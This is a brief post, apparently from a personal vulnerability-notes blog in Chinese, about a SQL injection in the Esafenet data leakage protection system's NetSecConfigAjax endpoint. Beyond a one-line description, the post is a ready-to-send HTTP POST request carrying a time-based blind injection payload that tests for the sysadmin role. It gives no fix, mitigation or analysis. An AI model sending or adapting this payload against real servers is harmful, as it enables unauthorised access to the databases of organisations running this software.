Babing
Published on 2024-08-30 / 4 Visits
0
0

Y37-1亿赛通-数据泄露防护(DLP)系统-SQL

Y37-1亿赛通-数据泄露防护(DLP)系统-SQL

漏洞描述:

亿赛通数据泄露防护(DLP)系统 NetSecConfigAjax SQL 注入

漏洞复现:

payload:

POST /CDGServer3/NetSecConfigAjax;Service HTTP/1.1 Host:
Content-Type: application/x-www-form-urlencoded
command=updateNetSec&state=123';if (select IS_SRVROLEMEMBER('sysadmin'))=1 WAITFOR DELAY '0:0:5'--

Comment